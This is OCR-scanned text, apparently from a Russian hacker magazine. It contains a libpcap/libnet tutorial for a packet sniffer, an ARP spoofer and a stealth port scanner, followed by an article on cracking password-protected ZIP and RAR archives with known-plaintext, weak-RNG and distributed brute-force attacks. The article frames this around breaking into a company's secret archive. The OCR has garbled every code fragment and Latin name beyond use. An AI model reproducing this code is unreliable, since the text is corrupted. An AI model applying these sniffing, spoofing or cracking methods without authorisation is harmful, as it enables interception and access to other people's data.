Теперь рассмотрим, как работать с каждой из 
этих библиотек в отдельности. 



Мы напишем 3 учебных программы: пас- 
сивный снифер с поддержкой библиотеки 
ІіЬрсар, АРР-спуфер с поддержкой библиоте- 
ки ІіЬпеі и простой сканер портов, использую- 
щий сразу обе эти библиотеки. Все исходники 
ты найдешь на БУБ к журналу. 

Перед началом работы библиотеки должны 
быть установлены в системе. В этом нет 
ничего сложного. В *піх-системах библиотеки 
ІіЬрсар и ІіЬпеі обычно идут с установочными 
дистрибутивами. В ѴѴіпсІоѵѵз в среде МісгозоЙ 
Ѵізиаі С++ после установки библиотек тебе 
понадобится выполнить настройку перемен- 
ных среды для обеспечения возможности 
компиляции программ. В самих архивах с биб- 
лиотеками идут мануалы с описаниями всех 
функций, заголовочных файлов и т.д. — к ним 
тебе следует обращаться за всеми деталями. 
Я писал и тестировал все примеры программ 
для этой статьи только под І_іпих. 

О Пассивный снифер с использованием 
библиотеки ІіЬрсар 

Во всех программах, которые используют 
библиотеку ІіЬрсар, должен быть включен за- 
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>Участок исходного кода сканера портов, построенно- 
го на библиотеках ІіЬрсар и ІіЬпе* 



головочный файл рсар. И. Типичная последовательность 
шагов, которую должна выполнить программа, использу- 
ющая библиотеку ІіЬрсар для выполнения своей задачи, 
выглядит так: 

1 . идентифицировать сетевой интерфейс; 

2. открыть сетевой интерфейс и создать сессию перехвата; 

3. создать фильтр, если он необходим; 

4. захватить и обработать пакеты; 

5. закрыть сессию перехвата. 

Рассмотрим подробно каждый шаг. 

0 Идентификация сетевого интерфейса 

Существует 3 основных способа идентификации сетевого 
интерфейса, на котором будет осуществляться прослуши- 
вание. Первый способ — без использования библиотеки 
ІіЬрсар. Имя интерфейса задается жестко в программе: 
«#сІеііпе ЭЕѴІСЕ "еіЬО"». Оно может также передаваться в 
программу пользователем через командную строку. 
Второй способ — использовать функцию рсар_ 
ІоокирсІеѵ() из библиотеки ІіЬрсар: 

#іпс1исіе <рсар.Ь> 

сЬаг еггЬиЕ [РСАР _ ЕРРВІІЕ _ ЗІ2Е] ; 
сДаг *сіеѵ = рсар _ Іоокирсіеѵ(еггЬиЕ) ; 

ІЕ (Ьеѵ == ШЫі) { 

Ерг±пЕЕ(зЕсіегг, "%з", еггЬиЕ); ехіЕ(-І); 

1 



В этом случае переменной сіеѵ присвоится имя подхо- 
дящего интерфейса. В буфер еггЬіЛ будет передано 
описание ошибки, если таковая возникнет при работе 
рсар_ІоокирсІеѵ(). Прототип функции рсар_ІоокирсІеѵ() 
выглядит следующим образом: 

сДаг *рсар _ 1оокирбеѵ(сДаг *еггЬиЕ) 

Т ретий способ — предложить пользователю выбрать 
интерфейс из предложенного списка. Такой список фор- 
мирует функция рсар_ІіпсІаІІсІеѵз(), ее прототип: 

рсар _ йпсіаіісіеѵз (рсар _ ІЕ _ Е **а11сіеѵ5р, сДаг 
*еггЬиЕ) 

Подробности об этой функции смотри в мануалах. Замечу, 
что функция рсар_ПпсІаІІсІеѵз() отсутствует в устаревших 
версиях библиотеки ІіЬрсар. 

□ Открытие сетевого интерфейса и создание сессии 
перехвата 

Открывает сетевой интерфейс и создает сессию пере- 



» 



хвата функция рсар_ореп_Ііѵе(), ее прототип выглядит 
следующим образом: 

рсар _ Е *рсар _ ореп _ 1іѵе(сопзЕ сДаг *Ьеѵісе, 
іпЕ зпаріеп, іпЕ рготізс, іпЕ Ео_тз, сДаг 
*еггЬиЕ) 



Здесь: 

■Іеѵісе — это имя интерфейса, которое мы определили на 
первом шаге; 

гпаріеп — целое число, определяющее максимальное 
количество байт сетевого пакета, которое будет захваты- 
ваться библиотекой; 

ргоппігс — флаг, переводящий интерфейс в неразборчи- 
вый режим (рготізсиоиз тосіе) (1 — установлен, 0 — нет); 
*о_пп5 — тайм-аут в миллисекундах (0 — чтение осущест- 
вляется до первой ошибки, -1 — бесконечно); 
еггЬиЕ — буфер, в который заносится сообщение об 
ошибке. 

ДЕМОНСТРАЦИОННЫЙ ФРАГМЕНТ КОДА 
#іпсіиЬе <рсар.Д> 

рсар _ Е *ДапЫе; 

сДаг еггЬиЕ [РСАР _ ЕККВІІЕ _ 5І2Е] ; 

Дапсііе = рсар _ ореп _ Ііѵе (сіеѵ, ВІІЕ5І2, Щ О, 
еггЬиЕ) ; 

ІЕ (Дапсііе == ШЪЬ) { 

ЕргіпЕЕ(зЕЬегг, "%з", еггЬиЕ); 
ехіЕ(-І); 

I 



Здесь открывается интерфейс, имя которого указано в 
сіеѵ, и говорится, сколько байт пакета захватывать (значе- 
ние ВЫР5І2 определено в рсар. И). Сетевой интерфейс пе- 
реключается в неразборчивый режим. Также отмечается, 
что данные будут читаться до тех пор, пока не произойдет 
ошибка. 

□ Создание фильтра 

Для включения фильтра в программу существуют две 
основные функции: рсар_сотрііе() и рсар_зеіШег(). Выра- 
жение для фильтра хранится в обыкновенной строке (мас- 
сиве символов). Синтаксис таких выражений полностью 
соответствует тому синтаксису, который используется ути- 
литой ісрсіитр. Перед тем как применить фильтр, его нуж- 
но «скомпилировать». Это делает функция рсар_сотріІе(). 
Ее прототип выглядит следующим образом: 



іпЕ рсар сошрііе(рсар 


Е *р, зЕгисЕ ЬрЕ 




ргодгат *Ер, сЬаг *зЕг, 


іпЕ орЕітіге, ЬрЕ 


■ 



іпЕ32 пеЕтазк) 



Первый аргумент — это дескриптор открытой сессии. 
Второй аргумент — указатель на область в памяти, где бу- 
детхраниться «скомпилированная» версия нашего филь- 




> Домашние страницы 

библиотек: 

ѵѵѵѵѵѵісрсіитр.огд 

— ІіЬрсар под ІЛЧІХ; 
ѵѵѵѵѵѵ.ѵѵіпрсар.ога 

— ІіЬрсар под ѴѴІпсІоѵѵз 
(ѴѴІпРсар); 

ѵѵѵѵѵѵ.раскеЕасіогѵ.пеЕ 
ІІЬпеі — ІІЬпеі под ЕІЫІХ; 
ѵѵѵѵѵѵ.раскеЕасІогѵ.пеІ/ 
ІІЬпеЕЫзЕЬергесаіеЬ/ 
иЬпеіЫТЩр — ІІЬпеі под 
ѴѴІпсІоѵѵз; 

ѵѵѵѵѵѵ.іпіопехиз.сот 

— домашняя страница 
Майка Шифмана. 



> В моей книге «Про- 
граммирование боевого 
софта под Ьіпих» ты 
сможешь найти более 
подробную информа- 
цию о программирова- 
нии с использованием 
библиотек ІіЬрсар и 
ІІЬпеЕ 




> На йѴО лежат ис- 
ходные коды снифера 
(зкІзпііі_рсар.с), АНР- 
спуфера (агрзрооіег.с), 
сканера портов 
(різсап.с), а также 
последние версии биб- 
лиотек ІіЬрсар и ІІЬпеі 
под ЕІІЧІІХ и ѴѴІпсІоѵѵз. 
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> Домашняя страничка автора библиотеки ІіЬпеІ Майка Шифмана 
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> Работаетпассивный снифер, написанный с использованием 
библиотеки ІіЬрсар. В командной строке задан фильтр: захваты- 
вать только ІСМР-пакеты и показывать дамп (-6) Ьех&азсіі 



тра. Далее идет само выражение фильтра в 
виде обычной строки. Следующий параметр 
определяет, нужно ли оптимизировать наше 
выражение (0 — нет, 1 — да). Последний 
параметр — маска сети, к которой применя- 
ется наш фильтр. Функция возвращает -1 в 
случае ошибки, все другие значения говорят 
об успешном завершении. 

После того как выражение «скомпилирова- 
но», его нужно применить, что осуществляет- 
ся с помощью функции рсар_зеШег(). 

Ее прототип выглядит так: 

іпк рсар _ зекйікег (рсар _ к *р, 
зкгиск Ърк _ ргодгат *кр) 

Первый аргумент — это дескриптор открытой 
сессии, второй — указатель на «скомпили- 
рованную» версию выражения для фильтра 
(как правило, второй аргумент функции 
рсар_сотріІе()). 

ДЕМОНСТРАЦИОННЫЙ ФРАГМЕНТ КОДА 

#іпсіибе <рсар.к> 

■ 

рсар _ Г *капбіе; // дескриптор сессии 
скаг беѵ[] = "еккО"; /* сетевой интер- 
фейс, на котором будем слушать */ 
скаг еггЬиТ [РСАР _ ЕККВИЕ _ 5І2Е] ; /* 
буфер под описание ошибки */ 
зкгиск Ърк _ ргодгат йікег; /* ском- 
пилированное выражение для фильтра*/ 
скаг йікег _ арр[] = "ибр бзк рогк 53 м ; 
/* выражение для фильтра */ 

Ърк _ и _ іпк32 шазк; /* сетевая маска 
нашего интерфейса */ 

Ърк _ и _ іпк32 пек; /* ІР-адрес нашего 
интерфейса */ 

рсар _ іоокирпек (беѵ, &пек, &тазк, 
еггЪик) ; 

ік (беѵ == шъь) { 
кргіпкк(зкбегг, "%з", еггЪик); 
ехік(-І); 



I 

капбіе = рсар _ ореп _ 1іѵе(беѵ, 

ВЙЕ5І2, 1, О, еггЪик) ; 
ік (капбіе == ЙІЛШ) { 
кргіпкк(зкбегг, ”%з", еггЪик); 
ехік(-І); 

Я 

ік (рсар _ сотрііе (капбіе, &йікег, 
йікег _ арр, 0, тазк) == -1) { 
кргіпкк(зкбегг, "%з", рсар _ 
декегг (капбіе) ) ; 
ехік(-І); 

Я 

ік (рсар _ зекйікег (капбіе, &йікег) 

== -і) { 

кргіпкк(зкбегг, "%з", рсар _ 
декегг (капбіе) ) ; 
ехік (-1); 

Я 

Эта программа подготавливает перехватчик 
ІЮР-пакетов, идущих на 53-й порт. 

Пример содержит две функции, которые мы 
еще не рассматривали: рсар_Іоокирпеі() и 
рсар_деіегг(). 

Первая функция необходима для опреде- 
ления маски сети, которую затем нужно 
подставить в последний параметр функции 
рсар_сотріІе(). Прототип функции: 

іпк рсар _ Іоокирпек (сопзк скаг 
*беѵісе, Ърк _ и _ іпк32 *пекр, Ьрк _ 
и _ іпк32 *тазкр, скаг *еггЪик) 

Хотя нам требуется только маска сети, но 
для полноты картины мы также определяем 
ІР-адрес. 

Функция рсар_деіегг() возвращает описание 
ошибки, в качестве параметра она принимает 
дескриптор открытой сессии. 

□ Захвати обработка пакетов 

Для перехвата пакетов может использоваться 
одна из четырех функций: рсар_пехі(), рсар_ 



пехі_ех(), рсар_бізраісН() или рсар_1оор(). 
Первые две функции за один вызов захва- 
тывают только по одному пакету. Вот их 
прототипы: 

сопзк и _ скал *рсар _ пехк(рсар _ к 
*р, зкгиск рсар _ ркккбг *к) 
іпк рсар _ пехк _ ех(рсар _ к *р, 
зкгиск рсар _ ркккбг **ркк _ кеабег, 
сопзк и _ скаг **ркк _ бака) 

Первый аргумент в обеих функциях — это де- 
скриптор открытой сессии. Второй аргумент 
— это указатель на структуру, описывающую 
принятый пакет (определение структуры 
смотри ниже в этом разделе). Третий аргу- 
мент имеет только вторая функция — это 
указатель на область памяти, где сохранен 
принятый пакет. 

Первая функция возвращает указатель на 
область памяти, в которой сохранен приня- 
тый пакет. Вторая функция возвращает одно 
из следующих числовых значений: 1 — пакет 
был прочитан; 2 — время ожидания истек- 
ло; -1 — произошла ошибка; -2 — пакеты 
прочитаны из сохраненного файла и больше 
недоступны. 

Если поместить эти функции в цикл, то 
можно организовать перехват заданного 
количества пакетов. Но лучше всего для цик- 
лического перехвата использовать функции 
рсар_Іоор() или рсар_бізраісб(). 

Эти две функции имеют фактически идентич- 
ные прототипы: 



іпк рсар 


1оор(рсар к *р, іпк 


спк. 


рсар капбіег саІІЪаск, и скаг 


*изег) 


іпк рсар 


бізракск(рсар к *р. 


іпк 


спк, рсар 


капбіег саІІЪаск, и 


скаг 



*изег) 



Первый аргумент — это дескриптор открытой 
сессии. Второй аргумент — это целое число, 
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указывающее, сколько пакетов требуется 
перехватить (-1 обозначает, что перехват 
должен продолжаться, пока не произой- 
дет ошибка). Третий аргумент — это имя 
саІІЬаск-функции, которая автоматически 
будет вызываться библиотекой ІіЬрсар 
каждый раз, когда будет приходить оче- 
редной пакет. Последний аргумент может 
использоваться для передачи каких-либо 
данных в саІІЬаск-функцию или устанавли- 
вается в І\ІШ_І_. 

Обе функции возвращают следующие 
значения: 0 — перехвачено спі пакетов; -1 
— произошла ошибка; -2 — цикл был оборван 
функцией рсар_ЬгеакІоор() (существует только 
в новых версиях библиотеки ІіЬрсар). 
Единственное различие между этими двумя 
функциями в том, какони обрабатывают тайм- 
аут, величина которого задается при вызове 
рсар_ореп_Ііѵе(). Функция рсар_1оор(), в отли- 
чие от рсар_сІізраісЬ(), игнорирует тайм-ауты. 
Подробности смотри в тап рсар. 
СаІІЬаск-функция — это не любая функция 
произвольного формата, она имеет свой 
прототип: 

ѵоіб ргосезз _ раскеД (и _ сДаг *изег, 
сопзД зДгисД рсар _ ркДДбг *Деабег,, 
сопзД и _ сДаг *раскеД) 

Первый аргумент — это указатель на данные, 
которые передаются в саІІЬаск-функцию из 
последнего аргумента функции рсар_1оор(). 



Второй аргумент — указатель на структуру 
рсар_ркіЬсІг, которая описывает захваченный 
пакет. Эта структура определена в рсар. И 
следующим образом: 

зДгисД рсар _ ркДДбг { 
зДгисД Дітеѵаі Дз; /* временная 
метка */ 

ЪрД _ и _ іпД32 саріеп; /* длина за- 
хваченных данных */ 

ЪрД _ и __ іпД32 Іеп; /* длина этого 
пакета */ 

>4 

Последний аргумент указывает на буфер, 
который содержит весь пакет, перехва- 
ченный с помощью рсар_1оор(). СаІІЬаск- 
функция не возвращает никакого значения 
(ѵоісі). 

В саІІЬаск-функции должна осуществляться 
обработка принятых пакетов. Делается это 
точно так же, как мы это делали в примерах 
без использования библиотеки ІіЬрсар, то 
есть определяются необходимые структуры 
заголовков сетевых пакетов и производится 
разбор принятого пакета на эти структуры, 
а значения полей выводятся на экран. 

□ Закрытие сессии перехвата 

Перед завершением работы следует закрыть 
сессию. Это делается с помощью функции 
рсар_сІозе(), которая имеет следующий 
прототип: 



ѵоісі рсар _ с1озе(рсар _ Д *р) 

Единственный аргумент функции — это де- 
скриптор сессии, которую нужно закрыть. 
Компиляция программ, использующих биб- 
лиотеку ІіЬрсар, осуществляется с указанием 
ключа — Ірсар. Для нашего снифераэто 
выглядит так: 

# дсс зкІзпіДД _ рсар. с -о зкІзпіДД _ 
рсар -Ірсар 

Вот пример использования: 

# ./зкІзпіДД _ рсар Дер апб бзД ДозД 
192.168.10.1 

В этом случае снифер будет отлавливать 
только ТСР-пакеты, отправляемые на узел 
192 . 168 . 10 . 1 . 

□ Сканер портов с использованием 
библиотек ІіЬрсар и ІіЬпеІ 

Наш сканер портов, использующий метод 
скрытого сканирования (ЬаІДореп зсаппіпд), 
задействует сразу две библиотеки. Я думаю, 
ты без труда разберешься в его исходном 
коде. Компиляция осуществляется следую- 
щим образом: 

# дсс різсап.с -о різсап ' ІіЬпеД-сопіід 
— беііпез' ' ІіЬпеД-сопІід — ІіЬз' 

' ІіЬпеД-сопІід — сііадз' -Ірсар ПИ 
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УНИКАЛЬНЫЕ ЖЕЛЕЗО И СОФТ 

+ Безупречные картинка и звук 
+ Запись без рекламы 
+ Объемное изображение 
+ Видеонаблюдение 



ШИРОКИЙ выбор удовлетворит всех 
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ЗА ОКНОМ ТИХАЯ ТЕМНАЯ НОЧЬ, И ТОЛЬКО СЛАБЫЙ ШУМ КУЛЕРА НАРУШАЕТ СПОКОЙСТВИЕ. ТЫ БРОСАЕШЬ СВОЙ ВЗГЛЯД 
НА ЧАСЫ В ТРЕЕ И ПОНИМАЕШЬ, ЧТО СКОРО УТРО И ЧТО СНОВА ВСЯ НОЧЬ ПРОШЛА В ПОПЫТКАХ ВЗЛОМАТЬ САЙТ КАКОЙ-ТО 
КОНТОРЫ. ВДРУГ КУРСОР ТВОЕЙ МЫШИ ЗАМИРАЕТ ВОЗЛЕ ФАЙЛАТ0Р5ЕСРЕТ.РАР. ДВОЙНОЙ ЩЕЛЧОК ПО ИМ ЕНИ ЭТОГО ФАЙЛА, 
И... ПЕРЕД ТОБОЙ СТАНДАРТНОЕ ОКНО С ПРЕДЛОЖЕНИЕМ ВВЕСТИ ПАРОЛЬ. ЕЩЕ НЕ ДО КОНЦА ОСОЗНАВ, ЧТО ПРОИЗОШЛО, 

ТЫ НЕРВНО СТУЧИШЬ ПО КЛАВЕ: ОѴѴЕРТУ, 123, АЗЬЕ, 5ЕХ, НО, КРОМЕ СООБЩЕНИЯ О НЕВОЗМОЖНОСТИ ИЗВЛЕЧЕНИЯ ФАЙЛОВ, 
НИЧЕГО НЕ ВИДИШЬ. ДАВАЙ ПОПРОБУЕМ РАЗОБРАТЬСЯ, КАК ЗАПОЛУЧИТЬ ЗАВЕТНЫЕ ФАЙЛЫ ТО Р5 ЕС РЕТ- АРХИВА. ЕСЛИ ТЫ 
ВНИМАТЕЛЬНЫЙ ЧИТАТЕЛЬ, ТО ПОМНИШЬ, ЧТО УЖЕ БЫЛА СТАТЬЯ, ОПИСЫВАЮЩАЯ ПРОГИ ДЛЯ ВЗЛОМА АРХИВОВ. МЫ РАС- 
СМОТРИМ ЭТОТВОПРОС В НЕМНОГО ДРУГОМ РАКУРСЕ. 



ЗАШИФРОВАННЫЕ АРХИВЫ И СПОСОБЫ ИХ ВЗЛОМА 



ОО методах шифрования, 
применяемых в архиваторах 

егодня существует довольно 
много различных алгоритмов 
криптографической защиты 
информации. Из числа наибо- 
лее современных можно выделить ЗОЕЗ, 

ЮЕА, ВІоѵѵЛзИ, СазМ28и некоторые из АЕЗ, 
включая новый АЕЗ ВупсІаеІ наряду с 2ІР-сжа- 
тием. А если говорить о методах шифрования, 
реализованных в программах-архиваторах, 
то здесь выбор более ограничен. В подавляю- 
щем большинстве случаев в популярных архи- 
ваторах реализован какой-нибудь один метод. 
Чаще всего 2ІР-кодирование или АЕЗ ВупсІаеІ. 
Исключение составляет РоѵѵегАгсНіѵег, 
в котором пользователю предоставляется 
целыхб вариантов кодирования сжатых 
данных: ВІоѵѵЛзИ (128 бит), ОЕЗ (64 бит), 



Тгіріе ОЕЗ (128 бит) и РЦпсІаеІ АЕЗ (128 бит) 
и обычное 2ІР-шифрование. Следует 
признать, что стандартное 2ІР-кодирование 
не относится сегодня к числу надежных, 
равно как и шифрование с применением 
алгоритма ОЕЗ (Оаіа Епсгурііоп ЗіапбагсІ). 
Последний в течение почти 20 лет оставался 
федеральным стандартом шифрования, как 
самый надежный являлся наиболее часто 
используемым алгоритмом симметричного 
блочного шифрования и применялся многими 
структурами, в том числе банками и службами 
обращения финансов. Однако сегодня вычис- 
лительные мощности значительно возросли, 
и уже не составит большого труда перебрать 
все возможные варианты ключей, ведь длина 
ключа в ОЕЗ — всего 8 байт. Малый размер 
ключа и низкая скорость шифрования — фак- 
торы, которые позволяют быстро взломать 



этот шифр при наличии мощного компа. 
Начиная с середины 90-х годов, стали появ- 
ляться кандидаты на замену ОЕЗ, наиболее 
известные из которых — Тгіріе ОЕЗ, ЮЕА 
и ВІоѵѵГзН. Первый и последний применяются 
и сегодня в разных программных средствах 
для шифрования данных, в том числе в архи- 
ваторах. А ЮЕА используется РОР и рядом 
других криптографических программ. Тгіріе 
ОЕЗ («тройной ОЕЗ», так как трижды шифру- 
ет информацию «обычным» алгоритмом ОЕЗ) 
свободен от основного недостатка прежнего 
варианта — короткого ключа. Здесь ключ 
в 2 раза длиннее, и потому надежность 
«тройного» ОЕЗ намного выше. Но Тгіріе ОЕЗ 
унаследовал и слабые стороны своего пред- 
шественника — отсутствие возможностей 
для параллельных вычислений при шифро- 
вании и низкую скорость. 
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>Архивированиеспаролем вѴѴіпРаг 



> Сходство интерфейса ІІШтаІе2ір и известного ѴѴіпІір налицо 



Современный 64-битный блочный шифр ВІоѵѵТізИ с клю- 
чом переменной длины от 32 до 48 бит в настоящее время 
считается достаточно сильным алгоритмом. Он был 
разработан в 1 993 году в качестве замены уже сущест- 
вующих алгоритмов и является намного более быстрым, 
чем ОЕЗ, Тгіріе ОЕЗ и ЮЕА. 

Однако наиболее надежным сегодня признается РупсІаеІ 
— новый стандарт шифрования АЕЗ. Он имеет 3 размера 
ключа: 128, 192 и 256 бит и обладает массой достоинств. 

К их числу относятся высокая скорость шифрования, 
минимальные требования к вычислительным ресурсам, 
устойчивость ко всем известным атакам и легкая расши- 
ряемость (при необходимости можно увеличить размер 
блока или ключа шифрования). Более того, в ближайшем 
будущем АЕЗ РіфсІаеІ останется самым надежным мето- 
дом, поскольку если даже предположить, что появится 
компьютер, способный проверить 255 ключей в секунду, 
то потребуется приблизительно 1 49 триллионов лет, 
чтобы определить 1 28-битный ключ АЕЗ! 

□ Шифрование в 2ІР-архивах 

Напомню, что формат 21 Р считается мировым стандартом 
архивирования и обладает самой длинной историей, 
а архиватор ѴѴіп2ір стал самым скачиваемым продуктом. 
О его популярности свидетельствует и тот факт, что 
большинство архивов в интернете имеют формат 2ІР. 
Возможности ѴѴіп2ір достаточно широки для того, чтобы 
обеспечить надежное и эффективное архивирование 
данных. ѴѴіп2ір ориентирован преимущественно на 
2ІР-архивы, но при этом поддерживает и популярные 
архивные форматы ТАР, 02ІР, Шепсосіе, ХХепсобе, 
ВіпНех, МІМЕ, АРф І_2Н и АРС. В то же время существен- 
ным недостатком программы можно считать тот факт, что 
ѴѴіп2ір не работает с широко используемыми архивными 
форматами, к примеру с РАР, АСЕ и ЗАР. 

Но вернемся к теме шифрования данных в ѴѴіп2ІР. Долгое 
время возможность парольной защиты в этом архивато- 
ре была скорее маркетинговым ходом, нежели действи- 
тельно полезной функцией. В интернете существовало 
огромное количество прог, позволяющих подобрать 
пароль к таким архивам за считанные часы, если не 
минуты. Ситуация изменилась лишь недавно, с выходом 
последней, девятой версии архиватора. Тогда в ѴѴіп2ір 
появилась поддержка 1 28- и 256-битного шифрования 



по алгоритму РупсІаеІ. Процедура кодирования оста- 
лась столь же простой, что и раньше: требуется только 
выбрать степень шифрования и дважды ввести пароль. 
Другое дело, что многие юзеры по-прежнему работают со 
старыми версиями программы и до сих пор питают иллю- 
зии по поводу защищенности своих архивов. Остановим- 
ся на этом подробнее. 

□ Взлом 2ІР-архивов 

Итак, чтобы взломать 2ІР-архив, созданный ранней вер- 
сией ѴѴіп2ір, особыхусилий не требуется. При наличии 
среднестатистического компа скорость перебора паро- 
лей достигает несколько миллионов в секунду. И если 
пароль на архив ставил простой смертный, то при таких 
темпах перебора подобрать его удается быстро. Уверен, 
что многим не раз уже приходилось заниматься подобно- 
го рода перебором, и никаких вопросов тут возникнуть 
не должно. А что если не хочется или нет времени тупо 
перебирать миллионы возможных комбинаций символов? 
К нашей радости, есть и другой способ. Стоит упомянуть 
известную многим программу АбѵапсесІ АгсИіѵе Раззѵѵогб 
Ресоѵегу от фирмы «Элкомсофт», предназначенную для 
подбора паролей ко многим типам архивов. Ей поддержи- 
ваются такие типы атак: 

1 . банальный перебор паролей; 

2. перебор паролей по маске; 

3. перебор паролей по словарю; 

4. ріаіпіехі-атака; 

5. гарантированная расшифровка ѴѴіп2ір; 

6. пароль из ключей. 

Мы подробнее остановимся на ріаіпіехі, гарантированной 
расшифровке ѴѴіп2ір и пароле из ключей. 

Итак, что же это за атака такая — ріаіпіехі? Как известно, 
2ІР-файлы шифруются по довольно сильному алгоритму: 
пароль не сохраняется внутри архива, а конвертируется 
в 32-битный ключ, который используется для шифрова- 
ния. Но этот алгоритм не такой крутой, как, например, 
ОЕЗ, РЗА, ЮЕА и т.д. Один из способов взлома защиты 
2ІР-файлов предполагает использование архива с точ- 
ной копией одного из файлов зашифрованного архива, 
сделанного тем же архиватором и с той же степенью 
компрессии. Он не должен быть меньше 1 2 байт. Атака 



> Время, необходимое 
для полного перебора 
всех вариантов пароля, 
растет как степенная 
функция вместе с рос- 
том длины пароля. 



> Не забывай, что вся 
приведенная инфор- 
мация предназначена 
только для ознакомле- 
ния и предупреждения 
ошибок при создании 
архивов с конфиденци- 
альной информацией. 
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> Рабочее окно АсІѵапсесІ АгсЬіѵе РаззѵѵогсІ Ресоѵегу 




> До боли знакомое многим окно стребованием ввести пароль 



происходит в 2 этапа: отброс заведомо 
неподходящих ключей, а после — поиск под- 
ходящих. На первой фазе работы, которая 
занимает от одной до трех минут (это зависит 
от размера архива с одним файлом и коли- 
чества твоей оперативки), оставшееся время 
не может быть вычислено, так что большую 
часть времени процесс-индикатор держится 
на нуле. К счастью, этот тип атаки не настоль- 
ко долог, как простой перебор всех возмож- 
ных паролей, что позволяет использовать 
его для более быстрого вскрытия паролей на 
2ІР- и 02ІР-архивы. Минусом атаки этого типа 
является то, что нужно иметь незашифрован- 
ный файл, идентичный зашифрованному, что 
редко бывает осуществимо. 

Теперь поговорим о гарантированной рас- 
шифровке Ѵ\/іп2ір. Эта атака схожа с преды- 
дущей, однако не требует наличия никаких 
дополнительных архивов с файлами. 

В самом же запароленном архиве должно 
быть как минимум 5 файлов. Атака работает 
с архивами, созданными при помощи ѴѴіп2ір 



не выше версии 8.0 включительно, а также 
с другими архиваторами на основе исходни- 
ков ІпІо-2ІР. Если архив имеет меньше пяти 
файлов, программа выдаст сообщение об 
ошибке. Атака состоит из трёх этапов: пер- 
вые 2 ищут подходящие ключи, а последний 
на основе этих ключей генерирует пароль 
(не более 10 символов). Первая часть атаки 
обычно длится несколько минут (прога 
может показывать оставшееся время как 
несколько часов, но это теоретический мак- 
симум), вторая — около получаса (тут тоже 
не стоит обращать внимания на предсказа- 
ния программы), а последняя — 2-3 минуты. 
Атака работает с большинством 2ІР-архи- 
вов, и даже если пароль достаточно длинен 
и не был найден на последней стадии атаки, 
программа сможет расшифровать архив, 
просто снимая парольную защиту. Этот тип 
атаки базируется на плохом генераторе 
случайных чисел, который использовался 
в ѴѴіп2ір до версии 8.1. Однако даже версии 
ѴѴіп2ір ниже 8.1 в 0,4% случаев генерируют 



«нормальные» архивы, которые не могут 
быть взломаны таким образом. В подобном 
случае программа покажет предупрежде- 
ние, которое означает, что на первой стадии 
атаки не будет найдено ни одного ключа. 

И, наконец, о пароле из ключей. Если ты 
внимательно читал статью, то заметил, что 
описанные выше методы атаки сначала 
пытаются найти ключи шифрования для 
запароленных архивов и расшифровы- 
вают сам архив, если не было найдено ни 
одного пароля. Однако использоваться 
они могут только для архивов с паролями 
длинной менее 10 символов. Для архивов 
с более длинными паролями существует 
специальный тип атаки. Если у тебя есть 
ключи шифрования для запароленного 
архива и ты хочешь найти этот длинный 
пароль, выбери «Пароль из ключей» в ка- 
честве атаки и введи эти ключи на закладке 
РІаіпіехі. Обычно эта атака используется, 
чтобы узнать пароль на архив длинной 14-15 
символов. Лучше всего в свойствах атаки 



Использование сети для брутфорса РАР-архивов 



Для ускорения процесса пере- 
бора паролей можно использо- 
вать не один комп, а целую сеть. 
Понятное дело, чем большим 
количеством компов ты распо- 
лагаешь, тем быстрее получишь 
заветный пароль. Однако не 
спеши сразу напрягать всю 
сеть. Лучше вспомни матема- 
тику и попытайся посчитать, 
сколько времени займет 
брутфорс. К примеру, тебе 
известно, что некто в качестве 



пароля к РАР-архиву исполь- 
зовал слово из семи строчных 
латинских букв (всего их 26). 
Отсюда следует, что пароль 
может состоять из 8031 810176 
(26x7) всевозможных комбина- 
ций. Проверяя по 20 паролей 
в секунду, верный будет найден 
через приблизительно 12,7 года 
(80318101 76/20/3600/24/365)! 
Сомневаюсь, что кто-то попы- 
тается проделать подобное на 
практике :). 



Ситуация кардинально из- 
менится, если использовать 
целую сеть, скажем, из 80-ти 
компов. Несложно посчи- 
тать, что в этом случае все 
комбинации будут проверены 
за 0, 1 6 года, что составляет 
примерно 58 дней. 

Вероятно, у тебя возник вопрос, 
а как же организовать этот 
самый перебор по сети. Рас- 
смотрим это на примере проги 
АсІѵапсесІ АгсИіѵе РаззѵѵогсІ 



Ресоѵегу. К сожалению, в ней 
нет специализированных 
возможностей для брутфорса 
по сети, но зато есть функция 
указания набора символов 
и длины пароля для перебора. 
Установив прогу на каждый комп 
в сети и манипулируя этими па- 
раметрами, мы задаем диапазон 
для перебора. А чтобы не бегать 
к каждой машине сети лично, 
можно воспользоваться специа- 
лизированным софтом. 
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>Графиквремени перебора напоминает — это нечтоиное, как 
графикстепенной функции у=сххЬ, где с и Ь — константы 



Графмчыіш пре-дс-тааленмЁ эаоиенмэсгтм вреііени 
перебора от кол-ва компов 



та 




цкфрснпі «мянроа ■ *ч»ал# 



> Разница во времени брутфорса при использовании 1 РС и 20 РС 
(на этом рисунке показано время, необходимое для перебора всех 
комбинаций символов 0-9 с длиной 7 и 8 цифр) 



«КАК ИЗВЕСТНО, 2ІР-ФАЙЛЫ ШИФРУ- 
ЮТСЯ ПО ДОВОЛЬНО СИЛЬНОМУ АЛ- 
ГОРИТМУ: ПАРОЛЬ НЕ СОХРАНЯЕТСЯ 
ВНУТРИ АРХИВА, А КОНВЕРТИРУЕТСЯ 
В 32-БИТНЫЙ КЛЮЧ, КОТОРЫЙ ИС- 
ПОЛЬЗУЕТСЯ ДЛЯ ШИФРОВАНИЯ» 



установить её начало с седьмого символа 
пароля, так как его начало может быть вос- 
становлено из «хвоста». Вводя позицию для 
старта, стоит помнить, что в любом случае 
атака начинается с конца пароля. Об этом 
можно говорить часами, но нам давно пора 
оставить в покое 2ІР-архивы и посмотреть, 
какие сюрпризы приготовили нам другие 
архиваторы. 

□ Взлом КАК-архивов версии 3. X 

Вот и дошла очередь до защищенного 
паролем файла іорзесгеі. гаг, о котором шла 
речь в начале статьи. Сказать честно, тут 
перспективы не такие радужные, как в слу- 
чае с 2ІР-архивами. Г оворят, что програм- 
меры из «Элкомсофта» потратили немало 
времени в поисках уязвимостей шифрова- 
ния в ѴѴіпРаг. К сожалению, результатов эта 
работа не принесла. Как и в других архивах, 
защита информации от несанкциониро- 
ванного доступа осуществляется в ѴѴіпРаг 
в первую очередь за счет шифрования 
данных. Пароль можно установить как по 
умолчанию (в этом случае архивирование 
с паролем будет продолжаться до его 
отмены), так и непосредственное процес- 



се архивирования в случае однократного 
применения. 

При необходимости шифрования имен фай- 
лов требуется дополнительное включение 
соответствующей опции в диалоге задания 
пароля. Зашифрованный в таком режиме 
архив без пароля невозможно распаковать. 
Нельзя даже просмотреть список находя- 
щихся в нем файлов. 

Как уже говорилось выше, в формате 
2ІР применяется собственный алгоритм 
шифрования, который в целом считается 
